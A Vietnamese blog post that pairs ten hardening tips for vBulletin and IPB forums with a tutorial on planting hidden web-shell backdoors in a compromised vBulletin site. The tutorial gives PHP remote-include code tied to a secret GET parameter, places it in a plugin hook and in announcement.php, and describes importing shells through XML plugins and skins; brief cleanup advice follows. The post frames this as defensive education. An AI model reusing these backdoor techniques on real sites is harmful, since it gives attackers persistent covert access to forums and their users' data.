Hack vbb

September 13, 2011 at 1:36 pm Leave a comment

10 cách bảo mật cho diễn đàn VBB và IPB
1. Chống Hack Local:
Hack local là nổi ám ảnh của các diễn đàn, đây là phương pháp hack khá dễ và độ thành công của nó rất cao.
Hacker tấn công theo phương pháp trên bằng cách nào? Đầu tiên họ sẽ làm thế nào đó để có thể có một hosting trên cùng server với hosting của bạn( mua bằng thẻ tín dụng, hay mua bằng tiền mặt). Sau đó sẽ upload lên host của họ một con remview.php (script này do nhóm hacker Nga viết). Họ sẽ chạy script này trên IE ví dụ: http://xxx.com/remview.php ; với tác dụng của script này , nó có thể xem toàn bộ các user trên Server đó, thậm chí có thể xem nội dung từng file trong các user này. Đối với forum IBF thì hacker xem nội dung file conf_global.php và forum VBB thì xem nội dung file config.php trong thư mục Includes, đây là 2 file chưa các thông tin về cơ sở dữ liệu trong forum của bạn. Như vậy là họ biết các thông số về Cơ sở dữ liệu trong forum (user DB,PassDB , Dbname). Qua đây hacker có thể khai thác tài nguyên bằng cách chạy một forum cùng chung Database với forum của bạn, và có thể Drop (xóa) tất cả Dữ liệu trong forum bạn.
Để chống lại cách hack local bạn cần phải làm thế nào đó cho các hacker không thể xem được nội dung của những file chứa thông tin cơ sở dữ liệu. ChMod là một phương pháp tốt để chống nó. ChMod các thư mục các file trong thư mục Forum. ChMod là thay đổi thuộc tính của thư mục, file nó cho phép người khác có thể xem , đọc, sửa chửa các file của bạn hay không.
Đầu tiên ChMod thư mục Public_html thành 710 hoặc 711(nếu Server cho phép). Bạn Chmod tất cả các thư mục thành 755, tiếp theo sau đó đối với forum IBF thì Chmod file conf_global.php và đối với forum VBB thì chmod file config.php thành 644. Như vậy hacker không thể xem nội dung 2 file quan trọng trên.
Thêm một phương pháp nữa là bạn mã hóa (Zencode) nội dung cả hai file trên. Phương pháp này rất an toàn nhưng có hạn chế là nếu bạn quên các thông tin về cơ sở dữ liệu thì không thể nào lấy lại được , có thể tham khảo tại Welcome to Zencode (http://zencode.com)

2. Đổi tên , xóa các thư mục, dùng file robots.txt:
Các chương trình Scan Web có thể xem cấu trúc website của bạn, nhằm chống và hạn chế thì bạn có thể tham khảo các cách sau:
Đối với Forum VBB thì bạn tiến hành đổi tên thư mục AdminCP, ModCP trong file config.php. Bạn tìm và thay thế hai từ trên thành tên bất kì. Sau đó sẽ đổi tên cả hai thư mục đó thành tên mà bạn đã đổi trong file config.php
Xóa các thư mục: Đối với hai loại forum trên thì bạn nên xóa thư mục install khi đã cài đặt xong.
Xóa file: Nếu bạn đang sử dụng forum IBF phiên bản 1.3 thì xóa file: ssi.php và vì hacker có thể chiếm đoạt quyền Admin thông qua file ssi.php
Dùng file robots.txt: cách viết và sử dụng file này đã đăng trên nhiều số báo của Echip, bạn có thể xem lại

3. Không nên cập nhật ngay các phiên bản mới nhất:
Bởi các nhà viết Source không nhận ra các lỗi trong phiên bản này nên bạn cần lưu ý, trong quá trình sử dụng nên chọn phiên bản đã bảo mật tốt, không bị các lỗi để hacker khai thác. Sau khi họ đã cập nhật cách sửa lỗi thì lúc đó bạn Upgrade lên cũng chưa muộn.

4. Không nên hack quá nhiều Mod:
Đối với hai loại Forum phổ biến trên thì cập nhật thêm các công dụng rất nhiều, cũng chính trong quá trình đó phát sinh ra nhiều lỗi kĩ thuật (bug), bạn chỉ nên cập nhật các Mod cần thiết cho forum của mình.

5. Chống flood cho diễn đàn :
Ở hai loại forum này đã có các chế độ chống flood. Bắt buộc phải xác nhận ảnh (gồm chuổi chữ, số khi đăng kí. Định thời gian log out. Vì vậy bạn nên Enable các chức năng này trong Admin Control Panel .

6. Không cho sử dụng một số từ trong bài viết của thành viên:
Bạn nên bỏ chức năng sử dụng tag (thẻ html trong bài viết vì qua đây có thể lấy được ****** của thành viên khác.
Loại bỏ một số từ, kí tự: “,” , “;”, “//”, “/”.

7. Xóa ****** lần nữa khi đã logout:
Mặc dù cả hai loại forum trên đã có chế độ tự động xóa ****** mỗi khi thành viên log out nhưng nó thường xuyên bị lỗi, do vậy sau khi đã logout tốt nhất bạn nên vào Internet Option sau đó chọn Delete ******.

8. Gỡ bỏ chương trình Upload bằng FTP:
Một số chương trình sẽ lưu lại Username và mật khẩu của bạn nên sau khi đã hoàn thành Upload các file cần thiết lên thư mục nào đó trong forum bạn nên gỡ bỏ các chương trình này, vào Add/Remove Program để thực hiện chức năng này

9. Đặt file index.html hoặc file .htpasswd trong thư mục dành riêng cho nhóm người nào đó:
Đây là phương pháp ngăn không cho mọi người có thể tự động khai thác tài nguyên một cách vô tư , đồ “quý hiếm” dành cho một nhóm người nào đó trong Diễn đàn.
Bạn có thể tạo một file index.html với nội dung bất kì hoặc để trống , sau đó upload lên thư mục cần bảo mật.
Thứ hai là có thể đặt file .htpasswd với mật khẩu chỉ dành riêng cho nhóm người đó trong thư mục cần bảo mật.
Như trang này chúng ta có thể xem các công cụ hack của họ một cách thoải mái:
Nhanhoa.com – Offline (http://tuoitrehue.net/baby)

10. Thường xuyên vào các Website Bảo mật để xem thêm thông tin và cách khắc phục các lỗi cho Diễn đàn của mình.
Trên Internet có nhiều forum chuyên về bảo mật cho lỗi của hai loại forum trên, đây là một số trang bạn có thể tham khảo:
vBulletin – Instant Community (http://vbulletin.com) ; vBulletin.org Forum – The Official vBulletin Resource! (http://vbulletin.org) ; Invision Power Services :: Community :: Board :: Home (http://invisionboard.com) ; .:: H V A O n l i n e ::. (http://hvaonline.net)

Trên đây là 1 số kinh nghiệm cho những bạn nào có diễn đàn, bài này mình sưu tầm được trên mạng, xin lỗi tác giả vì không nhớ tên nên không ghi bản quyền của ai .

Phương pháp include shell trong source VBB và cách phòng chống

Bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu.
Tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện thì nó sẽ giúp ích rất nhiều cho bạn .

I/Phương diện hacker – upload shell

Bỏ qua phần làm thế nào hacker có shell trên host, mình chỉ nói đến việc hacker đã khai thác file config và hoàn toàn chiếm quyền admin của website bạn. Sau đây mình sẽ liệt kê một cách gần như đầy đủ các phương pháp mà hacker có thể chèn shell và ẩn nó trong forum của bạn để có thể dễ dàng trong những cuộc tấn công tiếp theo.

Method 1: tạm gọi là up shell qua việc edit teamplate (cách này gần giống với kiều RFI-remote file include)

Bạn lần lượt làm như sau:
Vào admincp –>Plugin manager –>Add new plugin Ở phần HOOK Location bạn chọn là : CACHE_TEMPLATE nhé,
Phần Name: có thể đặt tên tùy ý
Phần plugin php code hãy dùng đoạn code sau để include shell:

Code:

{
if($_GET[‘nameshell’]==”heloworld”){
include(‘http://localhost/r57new.php’);
}
}
“>
Nhớ kích vào nút đồng ý (yes) để active plugin này nhé .
“>

Bây giờ cùng test nhé ở đây mình test trên localhost.
bạn thêm phần ?nameshell=helloworld vào sau:
index.php hoặc image.php, online.php hay bất cứ file php nào ở ngoài index của host, cái này tùy thuộc vào bạn
Ở đây mình thử với index.php nhé
“>

Method 2: chèn shell bằng cách edit file .php có trong host
Bạn tìm những file mà admin ít để ý để chèn đoạn code sau vào nhé, có thể chèn vào bất cứ đâu mà bạn muốn.

Code:

if ($_REQUEST[‘nameshell’]==”helloworld”) { include (“http://localhost/r57new.php”); }

Demo: mình edit file announcement.php

Code:

/*================================================= =====================*\
|| ################################################## ################## ||
|| # vBulletin 3.7.2
|| # —————————————————————- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # —————- VBULLETIN IS NOT FREE SOFTWARE —————- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| ################################################## ################## ||
\*================================================ ======================*/
if ($_REQUEST[‘nameshell’]==”helloworld”) { include (“http://localhost/r57new.php”); }
// ######################## SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// ##################### DEFINE IMPORTANT CONSTANTS #######################
define(‘THIS_SCRIPT’, ‘announcement’);

// #################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array(
‘postbit’,
‘reputationlevel’,
‘posting’,

Hưởng thụ thành quả lao động nào

“>

Method 3: là cách import file xml qua plugin
Bạn lần lượt làm như sau:
Plugins & Products –> Download / Upload Plugins –> chọn lấy con shell xml và import vào.
“>

Bạn có thể mở source file shell xml lên và thay subscriptions.php bằng repair.php hoặc faq.php (bất cứ file .php nào trong admincp mà bạn nghĩ admin site đó sẽ không chú ý đến). Bạn cũng có thể import vào nhiều file cho chắc ăn

cách run shell cũng khá đơn giản là bạn import shell vào file nào thì run file đó thôi chẳn hạn tôi import shell vào file subscriptions.php tôi sẽ run shell như thế này admincp/subscriptions.php làm theo tương tự với những file khác
demo here:
“>

Method 4: import shell qua skin
Bạn lần lượt làm như sau:

Styles & Templates –> Download / Upload Styles –> chọn shell để upload (đính kèm ở bài viết)

Bạn muốn thêm shell vào skin nào thì ở phần Merge Into Style chọn skin đó.
“>

và đây là kết quả
“>
cũng cool đó nhỉ
II/Phương diện webmaster – giải quyết sự cố bị hack
Tiếp sau đây mình xin hướng dẫn các bạn cách clear shell trên host:
– Đầu tiên bạn sẽ phải quan sát thật kĩ xem có file nào lạ không.
– Tiếp theo bạn hãy download source forum về và dùng antivirut để check shell nếu hacker chỉ up shell thông thường lên forum và không dấu nó. Bạn chú ý xem kĩ những folder trong forum như include, modcp …
Nếu shell đã được mã hóa thì anti sẽ không check ra tốt nhất là nên up một source forum mới lên thay thế source forum cũ.
– Đối vời shell được chèn vào database và source thì tùy theo từng dạng ta có phương pháp phòng chống riêng
+ Method 1: đợi suy nghĩ xong rồi post tiếp
+ Method 2: upload new source như đã nói ở trên.
+ Method 3: bạn vào Plugin Manager bạn bắt đầu tìm với cột Hook Location nếu tìm thấy phần nào có init_startup thì đó chính là con shell mà hacker đã include vào
“>
+ Method 4: remove skin bị đính kèm shell

Bài viết có sử dụng tư liệu của mafia_boy,quang hùng, ly0kha, alucar,meoconx … Mấy anh này mình không nhầm thì bên VBF với HCE thì phải, bạn nào muốn tìm hiểu thêm những từ chuyên môn như Shell, Local….thì có thể search trên mạng hoặc vào 1 số diễn đàn hacker để tìm hiểu thêm vd: http://vnbrain.net/forumhttp://hcegroup.net và rất nhiều diễn đàn khác nữa . Còn rất nhiều kiểu tấn công, hack khác nữa rát nguy hiểm, hôm nào có thời gian mình post thêm sau . Bài này khá dài không biết có ai đọc không nữa, cố đọc nha, rất hữu ích đó . Thân các bạn!

Entry filed under: vbb. Tags: .

Part 7: Struts 2 Ajax Tutorial with Example Phong chong Sql injection

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed



%d bloggers like this: